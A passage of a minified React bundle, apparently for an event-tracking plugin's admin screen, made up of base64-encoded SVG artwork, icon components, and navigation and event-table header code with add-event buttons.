wzOS44NS0zNC4wOSw0My42OS0yLjU3LjUzLTUuNDcuODEtOC41Ni44MVptLTUuNDYtNzIuNTdjLTEyLjU4LDIuMTEtMzUuNjMsMTMuMDEtMzIuODUsMzkuMTcuOTksOS4zLDUuMTgsMTYuNzEsMTIuNDQsMjIuMDMsMTAuMzQsNy41NywyNC4zOSw5LjA0LDMzLjc0LDcuMTQsMTMuMzYtMi43MiwzNS0xNC4xNSwzMS4zMy0zOS43OC0xLjI3LTguODYtNS41Mi0xNS45OS0xMi42NS0yMS4yLTguNi02LjI4LTIxLjE2LTkuMTctMzIuMDItNy4zNWgwWiIgZmlsbD0iI2Y4ZjhmOCIgc3Ryb2tlLXdpZHRoPSIwIi8+PHBhdGggZD0ibTEwMy4xNiw3OS41OWMtMS41Ny0xMC4wNi0xMy40Ny0yMS44NS0zNC41My0xOC42My0yMC4wMywzLjA2LTI5LjI4LDE0LjY5LTI4LjM2LDI4LjA4LDEuMDcsMTUuNTgsMTcuMTMsMjQuOTIsMzcuNjgsMjAuOTEsMjIuOTMtNC40NywyNi43OC0yMC4zMSwyNS4yMS0zMC4zN1ptLTQ0Ljk2LDE1LjA0Yy0uODctLjIxLTEuNDUtLjg3LTEuNzMtMS42NS0uOTYtMi43OC0xLjUxLTUuOC0xLjIyLTguNzYuMjUtMi4yNCwzLjM1LTIuODgsNC40OS0uOTgsMS43MywyLjM2LDMuNDYsMTIuMjgtMS41NCwxMS4zOVptMjkuOTUtNi41N2MtLjUxLDIuMTktMy42OCwyLjQzLTQuNTIuMzctMS4wOS0yLjg1LTEuNjItNS45OS0xLjM0LTkuMDUuMjUtMi4yNCwzLjM1LTIuODgsNC40OC0uOTgsMS43MiwyLjk0LDIuMDgsNi4zNiwxLjM4LDkuNjZaIiBmaWxsPSIjZjhmOGY4IiBzdHJva2Utd2lkdGg9IjAiLz48cGF0aCBkPSJtNjguMjEsODYuMzZjMS44MSwxLjMzLDQuMzcsMS41NCw2LjE0LjA4LjYxLS40NSwxLjExLTEuMDgsMS40NS0xLjc0LjQ1LS44NywxLjgxLS4zOSwxLjYzLjU2LS42MSwzLjQ0LTQuNjUsNS4zNy03LjgsNC4xMy0xLS4zNy0zLjc2LTEuNzYtMi41My0zLjA1LjMzLS4yNi44LS4yNCwxLjExLjAyaDBaIiBmaWxsPSIjZWYzZTJmIiBzdHJva2Utd2lkdGg9IjAiLz48cGF0aCBkPSJtNDUuMTksMzcuMzVjLjAzLDIuMTEsMTMuODIsNS41NiwxNi4yOSw1LjI4bC0xLjMxLTEyLjEycy0xNS4wMSw0LjQxLTE0Ljk4LDYuODRaIiBmaWxsPSIjZWYzZTJmIiBzdHJva2Utd2lkdGg9IjAiLz48cGF0aCBkPSJtMzQuODMsODcuNjdjLjc4LDQuNTguMTgsOC41MS0yLjcsOS0yLjg4LjQ5LTYuOTUtMi42NC03LjczLTcuMjItLjc4LTQuNTgsMi4wMi04Ljg5LDQuOS05LjM4czQuNzUsMy4wMSw1LjU0LDcuNloiIGZpbGw9IiNmOGY4ZjgiIHN0cm9rZS13aWR0aD0iMCIvPjxwYXRoIGQ9Im02NS44LDUyLjMyYy0xLjA3LS4xMS0xLjk2LS45NS0yLjA4LTIuMDZsLTIuMTctMjAuMTNjLS4xNC0xLjI4Ljc4LTIuNDIsMi4wNi0yLjU2czIuNDIuNzgsMi41NiwyLjA2bDIuMTcsMjAuMTNjLjE0LDEuMjgtLjc4LDIuNDItMi4wNiwyLjU2LS4xNi4wMi0uMzIuMDItLjQ4LDBaIiBmaWxsPSIjZjhmOGY4IiBzdHJva2Utd2lkdGg9IjAiLz48ZWxsaXBzZSBjeD0iNzIuNTMiIGN5PSIxMzMuMTIiIHJ4PSIyNC44MyIgcnk9IjIuOTciIGZpbGw9IiNlNGVhZWYiIHN0cm9rZS13aWR0aD0iMCIvPjxwYXRoIGQ9Im0xMDUuNjEsNzVjLTEuMDctNS41LS40NS0xMC4yNSwzLjAxLTEwLjkyczguNDQsMi45OSw5LjUxLDguNDljMS4wNyw1LjUtMi4xOCwxMC43Ni01LjY0LDExLjQ0LTMuNDYuNjctNS44MS0zLjUtNi44OC05WiIgZmlsbD0iI2Y4ZjhmOCIgc3Ryb2tlLXdpZHRoPSIwIi8+PHBhdGggZD0ibTEyMy41Niw1NC43MWMxLjM3LS4yNywyLjc2LjUxLDMuMjEsMS44NywxLjE4LDMuNTYuMzYsOC44Mi0yLjA3LDEzLjQyLTIuMTQsNC4wNC01LjE1LDYuNzgtOC40Niw3LjcyLTEuNDkuNDMtMy4wNC0uNDQtMy40Ni0xLjkzLS40Mi0xLjQ5LjQ0LTMuMDQsMS45My0zLjQ2LDEuOC0uNTEsMy42My0yLjMxLDUuMDMtNC45NSwxLjktMy41OCwyLjI5LTcuMjUsMS43LTkuMDMtLjQ5LTEuNDcuMzEtMy4wNSwxLjc4LTMuNTQuMTEtLjA0LjIyLS4wNy4zMy0uMDlaIiBmaWxsPSIjZjhmOGY4IiBzdHJva2Utd2lkdGg9IjAiLz48cGF0aCBkPSJtMTcuNDEsNjguNDljLTEuMzctLjI3LTIuNzYuNTEtMy4yMSwxLjg3LTEuMTgsMy41Ni0uMzYsOC44MiwyLjA3LDEzLjQyLDIuMTQsNC4wNCw1LjE1LDYuNzgsOC40Niw3LjcyLDEuNDkuNDMsMy4wNC0uNDQsMy40Ni0xLjkzLjQyLTEuNDktLjQ0LTMuMDQtMS45My0zLjQ2LTEuOC0uNTEtMy42My0yLjMxLTUuMDMtNC45NS0xLjktMy41OC0yLjI5LTcuMjUtMS43LTkuMDMuNDktMS40Ny0uMzEtMy4wNS0xLjc4LTMuNTQtLjExLS4wNC0uMjItLjA3LS4zMy0uMDlaIiBmaWxsPSIjZjhmOGY4IiBzdHJva2Utd2lkdGg9IjAiLz48cGF0aCBkPSJtMjAuNjMsMzYuNzRjLS4xNy0uMzctLjY5LS40NS0uOTItLjEybC0xMi4yNSwxNy4xOWMtLjUuNzEtLjA1LDEuNjcuODEsMS42NGw2LjY0LS4yNC0uNDksNS41NGMtLjIsMS41NS45LDIuOTgsMi40NSwzLjE4czIuOTgtLjksMy4xOC0yLjQ1bC40OS01LjU0LDYuMzYsMS45MmMuODMuMjUsMS41MS0uNTcsMS4yLTEuMzhsLTcuNDgtMTkuNzVoMFoiIGZpbGw9IiNlZjNlMmYiIHN0cm9rZS13aWR0aD0iMCIvPjxwYXRoIGQ9Im0yMC41OSwyNS4yMmMuMDgtLjU4LjYtLjk4LDEuMTgtLjkxLjU4LjA3Ljk4LjYuOTEsMS4xOGwtLjgyLDYuMzljLS4wOC41OC0uNi45OC0xLjE4LjkxLS41OC0uMDctLjk4LS42LS45MS0xLjE4bC44Mi02LjM5WiIgZmlsbD0iI2VmM2UyZiIgc3Ryb2tlLXdpZHRoPSIwIi8+PHBhdGggZD0ibTEwLjg1LDI4LjY5Yy0uMzUtLjQ2LS4yNy0xLjEyLjE5LTEuNDdzMS4xMi0uMjcsMS40Ny4xOWwzLjkzLDUuMWMuMzUuNDYuMjcsMS4xMi0uMTksMS40N3MtMS4xMi4yNy0xLjQ3LS4xOWwtMy45My01LjFaIiBmaWxsPSIjZWYzZTJmIiBzdHJva2Utd2lkdGg9IjAiLz48cGF0aCBkPSJtNi40MiwzOC4wM2MtLjU4LS4wNy0uOTgtLjYtLjkxLTEuMTguMDctLjU4LjYtLjk4LDEuMTgtLjkxbDYuMzkuODNjLjU4LjA3Ljk4LjYuOTEsMS4xOC0uMDguNTgtLjYuOTgtMS4xOC45MWwtNi4zOS0uODNaIiBmaWxsPSIjZWYzZTJmIiBzdHJva2Utd2lkdGg9IjAiLz48cGF0aCBkPSJtMzMuNCwzOS40Yy41OC4wNy45OC42LjkxLDEuMTgtLjA3LjU4LS42Ljk4LTEuMTguOTFsLTYuMzktLjgzYy0uNTgtLjA3LS45OC0uNi0uOTEtMS4xOC4wNy0uNTguNi0uOTgsMS4xOC0uOTFsNi4zOS44M2gwWiIgZmlsbD0iI2VmM2UyZiIgc3Ryb2tlLXdpZHRoPSIwIi8+PHBhdGggZD0ibTI5LjkzLDI5LjY2Yy40Ni0uMzUsMS4xMi0uMjcsMS40Ny4xOXMuMjcsMS4xMi0uMTksMS40N2wtNS4xLDMuOTNjLS40Ni4zNS0xLjEyLjI3LTEuNDctLjE5cy0uMjctMS4xMi4xOS0xLjQ3bDUuMS0zLjkzWiIgZmlsbD0iI2VmM2UyZiIgc3Ryb2tlLXdpZHRoPSIwIi8+PHBhdGggZD0ibTE2LjYsNzMuOTZjLTUuNzMtLjExLTEwLjMyLTQuODctMTAuMjItMTAuNi4wMy0xLjQ5LDEuMjctMi43MSwyLjc2LTIuNzEsMS41Ny4wMywyLjc4LDEuMjksMi43NiwyLjgxLS4wMiwxLjMxLjQ3LDIuNTUsMS4zOSwzLjUuOTEuOTQsMi4xMywxLjQ3LDMuNDIsMS40OGgwYzIuNzMsMCw0LjkyLTIuMTUsNC45Ny00LjguMDMtMS41LDEuMjYtMi43MSwyLjc2LTIuNzEuMjIsMCwuMzguMDIuNTQuMDUsMS4zMS4yNiwyLjI0LDEuNDIsMi4yMSwyLjc1LS4xLDUuNjQtNC43NywxMC4yMy0xMC40MSwxMC4yMywwLDAtLjE5LDAtLjE5LDBaIiBmaWxsPSIjZjhmOGY4IiBzdHJva2Utd2lkdGg9IjAiLz48cGF0aCBkPSJtMTI0LjE1LDU4LjE4Yy01LjczLS4xMS0xMC4zMi00Ljg3LTEwLjIyLTEwLjYuMDMtMS40OSwxLjI3LTIuNzEsMi43Ni0yLjcxLDEuNTcuMDMsMi43OCwxLjI5LDIuNzYsMi44MS0uMDIsMS4zMS40NywyLjU1LDEuMzksMy41LjkxLjk0LDIuMTMsMS40NywzLjQyLDEuNDhoMGMyLjczLDAsNC45Mi0yLjE1LDQuOTctNC44LjAzLTEuNSwxLjI2LTIuNzEsMi43Ni0yLjcxLjIyLDAsLjM4LjAyLjU0LjA1LDEuMzEuMjYsMi4yNCwxLjQyLDIuMjEsMi43NS0uMSw1LjY0LTQuNzcsMTAuMjMtMTAuNDEsMTAuMjMsMCwwLS4xOSwwLS4xOSwwWiIgZmlsbD0iI2Y4ZjhmOCIgc3Ryb2tlLXdpZHRoPSIwIi8+PC9zdmc+",er=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{fillRule:"evenodd",d:"M10 3a1 1 0 011 1v5h5a1 1 0 110 2h-5v5a1 1 0 11-2 0v-5H4a1 1 0 110-2h5V4a1 1 0 011-1z",clipRule:"evenodd"}))})),tr=(0,r.createContext)({navLinks:[]}),rr=t=>{let{children:r,navLinks:a}=t;return(0,e.createElement)(tr.Provider,{value:{navLinks:a}},r)};function ar(e){const{hash:t}=location;return e===t}const ir=t=>{let{setAddCustomEventForm:a,setAddRecommendedEventForm:i}=t;const{navLinks:n}=(0,r.useContext)(tr);return(0,e.createElement)("header",{"data-component":"EventsTableHeader",className:"flex flex-col xl:flex-row items-center bg-white py-4 px-8 shadow-lg"},(0,e.createElement)("div",{className:"divide divide-x flex items-center rounded-full border-brand-primary xl:mr-2 shadow-3xl w-full"},n.map(((t,r)=>((t,r)=>{const a=ar(`#${t.path}`)||t.default&&ar("#/tracker");return(0,e.createElement)(Ie,{key:r,className:o()(a?"bg-brand-600 hover:text-white cursor-default text-white":"bg-brand-600/20 text-brand-500 hover:bg-brand-primary hover:text-white border-brand-600","text-base 2xl:text-xl",0===r&&"rounded-l-full",r===n.length-1&&"rounded-r-full","px-6","py-1","uppercase"),to:t.path},t.label)})(t,r)))),(0,e.createElement)("div",{className:"xl:flex-1"}),(0,e.createElement)("fieldset",{"data-component":"button-group",className:"space-x-4 mt-8 xl:mt-0 flex items-center justify-end w-full"},a&&(0,e.createElement)("button",{onClick:()=>{a&&a(!0)},type:"button",className:o()("capitalize flex","items-center justify-center","rounded-full","border border-transparent bg-brand-primary","px-4 2xl:py-2 py-1","text-sm font-medium text-white","shadow-sm","hover:bg-brand-600 shadow hover:shadow-xl active:shadow-xl","focus:outline-none focus:ring-2 focus:ring-brand-primary-focus focus:ring-offset-2","transform active:scale-75 hover:scale-105 transition-transform")},(0,e.createElement)(er,{className:"2xl:h-5 2xl:w-5 h-4 w-4","aria-hidden":"true"}),(0,e.createElement)("span",{className:"hidden 2xl:flex mx-2"},"Add Event"),(0,e.createElement)("span",{className:"2xl:hidden mx-2"},"Event")),i&&(0,e.createElement)("button",{onClick:()=>{i&&i(!0)},type:"button",className:o()("capitalize inline-flex","items-center justify-center","rounded-full","border border-transparent bg-brand-primary","px-4 2xl:py-2 py-1","text-sm font-medium text-white","shadow-sm","hover:bg-brand-600 shadow hover:shadow-xl active:shadow-xl","focus:outline-none focus:ring-2 focus:ring-brand-primary-focus focus:ring-offset-2","transform active:scale-75 hover:scale-105 transition-transform")},(0,e.createElement)("span",{className:"hidden 2xl:flex mx-2"},"Add Recommended Event"),(0,e.createElement)("span",{className:"2xl:hidden mx-2"},"Recommended Event"))))},nr=ir,ur=(0,r.createContext)(void 0),sr=t=>{let{children:a}=t;const[i,n]=(0,r.useState)(!1);return(0,e.createElement)(ur.Provider,{value:{showPromo:i,setShowPromo:n}},a)};function lr(){const e=(0,r.useContext)(ur);if(!e)throw new Error("usePromoContext must be used within a PromoContextProvider");return e}const or=()=>{const t=se(),a=(0,r.useContext)(c),{showPromo:i}=lr();if(!a)throw new Error("ChildComponent must be used within a TabContextProvider");const{pathname:n}=t,u=n.split("#");return(0,e.createElement)("header",{"data-component":"PluginNav"},(0,e.createElement)(Qe,null),(0,e.createElement)("div",{className:o()("sm:block","")},(0,e.createElement)("nav",{className:o()("relative"," z-50 flex","space-x-1"),"aria-label":"Tabs"},a.tabs.map(((t,r)=>(0,e.createElement)(Ie,{"aria-label":t.name.toString(),title:t.name.toString(),to:t.href,key:t.name.toString(),className:o()("group relative","flex items-center",{"flex-1":t.primary},u[0].includes(t.href)||t.rootTab&&"/"===u[0]?"bg-white text-brand-primary border-t-2 border-x border-black -mt-2 h-18 focus:border-none":"bg-white/60 text-grey-800 h-16","focus:z-10","flex items-center","group relative","border-transparent border-t-4 border-x-2 border-b-0","focus:border-transparent focus:ring-0","active:border-b-0","hover:border-t-4 hover:border-black/90","px-4","text-sm font-medium text-center","rounded-t-lg",""),"aria-current":u[0].includes(t.href)?"page":void 0},t.hasIssue&&(0,e.createElement)("span",{className:"w-4 h-4 absolute bg-red-600 rounded-full -top-1 -left-2"}),t.icon?t.icon:(0,e.createElement)("span",{"data-component":"tab-title",className:o()("text-xl uppercase flex-1",{"sr-only":t.showTitle})},t.name)))))))},cr=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{d:"M13.586 3.586a2 2 0 112.828 2.828l-.793.793-2.828-2.828.793-.793zM11.379 5.793L3 14.172V17h2.828l8.38-8.379-2.83-2.828z"}))})),Lr=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{fillRule:"evenodd",d:"M9 2a1 1 0 00-.894.553L7.382 4H4a1 1 0 000 2v10a2 2 0 002 2h8a2 2 0 002-2V6a1 1 0 100-2h-3.382l-.724-1.447A1 1 0 0011 2H9zM7 8a1 1 0 012 0v6a1 1 0 11-2 0V8zm5-1a1 1 0 00-1 1v6a1 1 0 102 0V8a1 1 0 00-1-1z",clipRule:"evenodd"}))}));var Mr=i(431),dr=i.n(Mr);const jr=t=>{let{type:r,setOpenHelpSlider:a}=t;return(0,e.createElement)(e.Fragment,null,(0,e.createElement)("div",{className:"min-h-full pt-16 pb-12 flex flex-col bg-white"},(0,e.createElement)("main",{className:"flex-grow flex flex-col justify-center max-w-7xl w-full mx-auto px-4 sm:px-6 lg:px-8"},(0,e.createElement)("img",{className:"h-full w-auto",src:"data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48c3ZnIGlkPSJhIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA5OTkuMyAyODguNTIiPjxwYXRoIGQ9Im0yMzQuMDIsMjM3LjU2Yy0xMC45NiwwLTIzLjgtMi45Ny0zMy45NC0xMC4zOS05LjctNy4xLTE1LjUyLTE3LjM5LTE2LjgzLTI5Ljc0LTMuNzEtMzQuOTMsMjYuNzktNDkuNDMsNDMuNDMtNTIuMjJoMGMxNC4yNS0yLjM4LDMwLjc3LDEuNDIsNDIuMTEsOS43LDkuNDgsNi45MywxNS4zOSwxNi44MiwxNy4wNywyOC41OSw0LjI3LDI5LjgyLTE4LjQ4LDQ4LjQzLTQxLjQzLDUzLjA5LTMuMTIuNjQtNi42NS45OC0xMC40MS45OFptLTYuNjMtODguMThjLTE1LjI4LDIuNTYtNDMuMjksMTUuODEtMzkuOTIsNDcuNiwxLjIsMTEuMyw2LjI5LDIwLjMsMTUuMTIsMjYuNzcsMTIuNTYsOS4yLDI5LjY0LDEwLjk5LDQxLDguNjgsMTYuMjQtMy4zLDQyLjU0LTE3LjIsMzguMDgtNDguMzQtMS41NC0xMC43Ni02LjcxLTE5LjQzLTE1LjM3LTI1Ljc3LTEwLjQ1LTcuNjQtMjUuNzItMTEuMTUtMzguOTEtOC45NGgwWiIvPjxwYXRoIGQ9Im0xOTcuMTcsMTk4Ljk4YzEuMywxOC45MywyMC44MiwzMC4yOCw0NS43OSwyNS40MSwyNy44Ny01LjQzLDMyLjU0LTI0LjY4LDMwLjYzLTM2LjktMS45MS0xMi4yMi0xNi4zNi0yNi41NS00MS45Ni0yMi42NC0yNC4zNCwzLjcyLTM1LjU4LDE3Ljg2LTM0LjQ3LDM0LjEzWiIvPjxwYXRoIGQ9Im0yMjAuODIsMTkxLjkxYzIuMTEsMi44Niw0LjIsMTQuOTMtMS44NywxMy44NS0xLjA2LS4yNi0xLjc2LTEuMDYtMi4xMS0yLjAxLTEuMTctMy4zOC0xLjgzLTcuMDUtMS40OC0xMC42NC4zMS0yLjcyLDQuMDctMy41LDUuNDUtMS4xOWgwWiIgZmlsbD0iI2ZmZiIvPjxwYXRoIGQ9Im0yNTMuNjcsMTg2LjA0YzIuMDksMy41NywyLjUzLDcuNzMsMS42OCwxMS43NC0uNjEsMi42Ni00LjQ3LDIuOTUtNS40OS40NS0xLjMyLTMuNDYtMS45Ny03LjI4LTEuNjMtMTEsLjMtMi43Miw0LjA3LTMuNSw1LjQ1LTEuMTloMFoiIGZpbGw9IiNmZmYiLz48cGF0aCBkPSJtMjMxLjEzLDE5NS43MWMyLjIsMS42Miw1LjMxLDEuODcsNy40Ni4xLjc0LS41NSwxLjM1LTEuMzEsMS43Ni0yLjExLjU1LTEuMDYsMi4yLS40OCwxLjk4LjY4LS43NCw0LjE4LTUuNjUsNi41My05LjQ4LDUuMDItMS4yMS0uNDUtNC41Ny0yLjE0LTMuMDctMy43LjQxLS4zMi45Ny0uMjksMS4zNS4wMmgwWiIgZmlsbD0iI2VmM2UyZiIvPjxwYXRoIGQ9Im0yMDMuMTYsMTM2LjE2Yy4wNCwyLjU3LDE2Ljc5LDYuNzYsMTkuOCw2LjQxbC0xLjU5LTE0Ljcycy0xOC4yNCw1LjM2LTE4LjIxLDguMzFaIiBmaWxsPSIjZWYzZTJmIi8+PHBhdGggZD0ibTE5MC41NiwxOTcuM2MuOTUsNS41Ny4yMSwxMC4zNC0zLjI5LDEwLjk0LTMuNS42LTguNDUtMy4yMS05LjM5LTguNzgtLjk1LTUuNTcsMi40NS0xMC44LDUuOTUtMTEuMzksMy41LS42LDUuNzcsMy42Niw2LjczLDkuMjNaIi8+PHBhdGggZD0ibTIyOC4yLDE1NC4zNWMtMS4zLS4xMy0yLjM4LTEuMTUtMi41My0yLjUxbC0yLjY0LTI0LjQ2Yy0uMTctMS41NS45NS0yLjk0LDIuNTEtMy4xMXMyLjk0Ljk1LDMuMTEsMi41MWwyLjY0LDI0LjQ2Yy4xNywxLjU1LS45NSwyLjk0LTIuNTEsMy4xMS0uMi4wMi0uMzkuMDItLjU4LDBaIi8+PGVsbGlwc2UgY3g9IjIzOC45MiIgY3k9IjI2MC4xNCIgcng9IjMwLjE3IiByeT0iMy42MSIgZmlsbD0iIzg2OGQ5MyIvPjxwYXRoIGQ9Im0yNzYuNTgsMTgxLjljLTEuMy02LjY5LS41NC0xMi40NiwzLjY2LTEzLjI4LDQuMi0uODIsMTAuMjYsMy42MywxMS41NiwxMC4zMnMtMi42NiwxMy4wOC02Ljg2LDEzLjljLTQuMi44Mi03LjA2LTQuMjUtOC4zNi0xMC45NFoiLz48cGF0aCBkPSJtMjk4LjM4LDE1Ny4yNWMxLjY2LS4zMywzLjM1LjYyLDMuOSwyLjI3LDEuNDMsNC4zMi40NCwxMC43Mi0yLjUyLDE2LjMxLTIuNiw0LjkxLTYuMjUsOC4yNC0xMC4yOCw5LjM4LTEuODEuNTItMy42OS0uNTQtNC4yLTIuMzUtLjUxLTEuODEuNTQtMy42OSwyLjM1LTQuMiwyLjE5LS42Miw0LjQxLTIuODEsNi4xMi02LjAyLDIuMzEtNC4zNSwyLjc5LTguODIsMi4wNy0xMC45OC0uNTktMS43OS4zOC0zLjcxLDIuMTYtNC4zLjE0LS4wNS4yNy0uMDguNDEtLjExWiIvPjxwYXRoIGQ9Im0yOTEuNzQsMTQ5LjkyYy4yLS4wNC40LS4wNi42MS0uMDcsMS44OC0uMDMsMy40MywxLjQ2LDMuNDcsMy4zNC4wMywxLjk0LDEuNjQsMy41LDMuNTksMy40NiwxLjk0LS4wMiwzLjUtMS42NSwzLjQ2LTMuNTktLjAzLTEuODgsMS40Ny0zLjQzLDMuMzQtMy40NywxLjg4LS4wMywzLjQzLDEuNDYsMy40NywzLjM0LjEsNS42OS00LjQ1LDEwLjQtMTAuMTUsMTAuNTItNS43LjEtMTAuNDItNC40NS0xMC41Mi0xMC4xNS0uMDMtMS42NywxLjE1LTMuMDgsMi43My0zLjRaIi8+PHBhdGggZD0ibTM0Ni4xNiwxNzYuNjFoLTMuMjJ2LTE2LjkyaC01Ljc5di0yLjc2aDE0Ljh2Mi43NmgtNS43OXYxNi45MloiLz48cGF0aCBkPSJtMzY1LjkxLDE2OS4xNGMwLDIuNDMtLjYyLDQuMzMtMS44Nyw1LjctMS4yNSwxLjM2LTIuOTgsMi4wNS01LjIxLDIuMDUtMS4zOSwwLTIuNjItLjMxLTMuNjktLjk0LTEuMDctLjYzLTEuODktMS41My0yLjQ2LTIuNzEtLjU4LTEuMTgtLjg2LTIuNTQtLjg2LTQuMDksMC0yLjQyLjYyLTQuMywxLjg2LTUuNjZzMi45OC0yLjAzLDUuMjQtMi4wMywzLjg2LjY5LDUuMTIsMi4wOGMxLjI2LDEuMzksMS44OCwzLjI2LDEuODgsNS42MVptLTEwLjg0LDBjMCwzLjQ0LDEuMjcsNS4xNiwzLjgxLDUuMTZzMy43Ny0xLjcyLDMuNzctNS4xNi0xLjI3LTUuMS0zLjgtNS4xYy0xLjMzLDAtMi4yOS40NC0yLjg5LDEuMzItLjYuODgtLjksMi4xNC0uOSwzLjc4WiIvPjxwYXRoIGQ9Im0zODkuMjksMTYxLjcydjEuNzRsLTIuNTQuNDdjLjIzLjMxLjQzLjcuNTgsMS4xNi4xNS40Ni4yMy45NC4yMywxLjQ1LDAsMS41NC0uNTMsMi43NC0xLjU5LDMuNjItMS4wNi44OC0yLjUyLDEuMzItNC4zOCwxLjMyLS40OCwwLS45MS0uMDQtMS4yOS0uMTEtLjY4LjQyLTEuMDIuOTItMS4wMiwxLjQ4LDAsLjM0LjE2LjYuNDguNzcuMzIuMTcuOS4yNiwxLjc2LjI2aDIuNmMxLjY0LDAsMi44OS4zNSwzLjc0LDEuMDUuODUuNywxLjI4LDEuNzEsMS4yOCwzLjAzLDAsMS42OS0uNywyLjk5LTIuMDksMy45LTEuMzkuOTItMy40LDEuMzctNi4wMywxLjM3LTIuMDMsMC0zLjU4LS4zNi00LjY1LTEuMDgtMS4wNy0uNzItMS42LTEuNzQtMS42LTMuMDcsMC0uOTIuMjktMS42OS44Ny0yLjMxLjU4LS42MiwxLjM5LTEuMDYsMi40My0xLjMtLjQyLS4xOC0uNzctLjQ3LTEuMDQtLjg3LS4yNy0uNC0uNDEtLjgyLS40MS0xLjI2LDAtLjU2LjE2LTEuMDMuNDctMS40MS4zMS0uMzkuNzgtLjc3LDEuNC0xLjE0LS43Ny0uMzMtMS40LS44Ny0xLjg4LTEuNjItLjQ4LS43NS0uNzItMS42My0uNzItMi42MywwLTEuNjIuNTEtMi44NywxLjUzLTMuNzZzMi40Ny0xLjMzLDQuMzYtMS4zM2MuNDIsMCwuODYuMDMsMS4zMy4wOS40Ni4wNi44MS4xMiwxLjA0LjE4aDUuMTZabS0xMS43LDE3LjIxYzAsLjY4LjMxLDEuMjEuOTIsMS41OC42MS4zNywxLjQ4LjU1LDIuNTkuNTUsMS43MiwwLDMuMDEtLjI1LDMuODUtLjc0Ljg0LS40OSwxLjI3LTEuMTUsMS4yNy0xLjk3LDAtLjY1LS4yMy0xLjExLS42OS0xLjM4LS40Ni0uMjctMS4zMi0uNDEtMi41OC0uNDFoLTIuNGMtLjkxLDAtMS42My4yMS0yLjE2LjY0LS41My40My0uOCwxLS44LDEuNzNabTEuMzYtMTIuMzljMCwuOTMuMjQsMS42NS43MiwyLjE1LjQ4LjUsMS4xNy43NSwyLjA3Ljc1LDEuODMsMCwyLjc1LS45OCwyLjc1LTIuOTQsMC0uOTctLjIzLTEuNzItLjY4LTIuMjQtLjQ1LS41My0xLjE0LS43OS0yLjA3LS43OXMtMS42MS4yNi0yLjA4Ljc4Yy0uNDcuNTItLjcxLDEuMjgtLjcxLDIuMjhaIi8+PHBhdGggZD0ibTM5OC41NSwxNzYuODhjLTIuMzIsMC00LjEzLS42OC01LjQzLTIuMDMtMS4zMS0xLjM1LTEuOTYtMy4yMS0xLjk2LTUuNThzLjYxLTQuMzQsMS44Mi01Ljc0YzEuMjEtMS4zOSwyLjg4LTIuMDksNS0yLjA5LDEuOTcsMCwzLjUyLjYsNC42NiwxLjc5LDEuMTQsMS4xOSwxLjcxLDIuODQsMS43MSw0LjkzdjEuNzFoLTkuOTJjLjA0LDEuNDUuNDQsMi41NiwxLjE3LDMuMzMuNzQuNzgsMS43NywxLjE2LDMuMTEsMS4xNi44OCwwLDEuNy0uMDgsMi40Ni0uMjUuNzYtLjE3LDEuNTctLjQ0LDIuNDQtLjgzdjIuNTdjLS43Ny4zNy0xLjU1LjYzLTIuMzQuNzgtLjc5LjE1LTEuNjkuMjMtMi43MS4yM1ptLS41OC0xMy4wM2MtMS4wMSwwLTEuODEuMzItMi40Mi45Ni0uNjEuNjQtLjk3LDEuNTctMS4wOCwyLjc5aDYuNzZjLS4wMi0xLjIzLS4zMS0yLjE2LS44OS0yLjc5LS41Ny0uNjMtMS4zNi0uOTUtMi4zNy0uOTVaIi8+PHBhdGggZD0ibTQxMy40OCwxNzQuMzNjLjc3LDAsMS41NC0uMTIsMi4zMi0uMzZ2Mi4zOGMtLjM1LjE1LS44LjI4LTEuMzUuMzgtLjU1LjEtMS4xMi4xNi0xLjcyLjE2LTMsMC00LjUtMS41OC00LjUtNC43NHYtOC4wM2gtMi4wM3YtMS40bDIuMTgtMS4xNiwxLjA4LTMuMTVoMS45NXYzLjMxaDQuMjR2Mi40aC00LjI0djcuOTdjMCwuNzYuMTksMS4zMy41NywxLjY5LjM4LjM2Ljg4LjU0LDEuNS41NFoiLz48cGF0aCBkPSJtNDM1Ljk0LDE3Mi4zN2MwLDEuNDUtLjUzLDIuNTctMS41OSwzLjM1LTEuMDYuNzgtMi41OCwxLjE3LTQuNTUsMS4xN3MtMy41OC0uMy00Ljc4LS45di0yLjczYzEuNzUuODEsMy4zOCwxLjIxLDQuODksMS4yMSwxLjk1LDAsMi45Mi0uNTksMi45Mi0xLjc2LDAtLjM4LS4xMS0uNjktLjMyLS45NC0uMjItLjI1LS41Ny0uNTEtMS4wNi0uNzgtLjQ5LS4yNy0xLjE4LS41Ny0yLjA2LS45Mi0xLjcxLS42Ni0yLjg4LTEuMzMtMy40OC0xLjk5LS42MS0uNjYtLjkxLTEuNTMtLjkxLTIuNTgsMC0xLjI3LjUxLTIuMjYsMS41NC0yLjk3LDEuMDMtLjcxLDIuNDMtMS4wNiw0LjE5LTEuMDZzMy40MS4zNSw0Ljk3LDEuMDZsLTEuMDIsMi4zOGMtMS42MS0uNjYtMi45Ni0xLTQuMDUtMS0xLjY3LDAtMi41LjQ4LTIuNSwxLjQzLDAsLjQ3LjIyLjg2LjY1LDEuMTguNDMuMzIsMS4zOC43NywyLjg1LDEuMzMsMS4yMy40OCwyLjEyLjkxLDIuNjgsMS4zMS41Ni4zOS45Ny44NSwxLjI0LDEuMzcuMjcuNTIuNCwxLjEzLjQsMS44NVoiLz48cGF0aCBkPSJtNDQ0LjkxLDE3NC4zM2MuNzcsMCwxLjU0LS4xMiwyLjMyLS4zNnYyLjM4Yy0uMzUuMTUtLjguMjgtMS4zNS4zOC0uNTUuMS0xLjEyLjE2LTEuNzIuMTYtMywwLTQuNS0xLjU4LTQuNS00Ljc0di04LjAzaC0yLjAzdi0xLjRsMi4xOC0xLjE2LDEuMDgtMy4xNWgxLjk1djMuMzFoNC4yNHYyLjRoLTQuMjR2Ny45N2MwLC43Ni4xOSwxLjMzLjU3LDEuNjkuMzguMzYuOD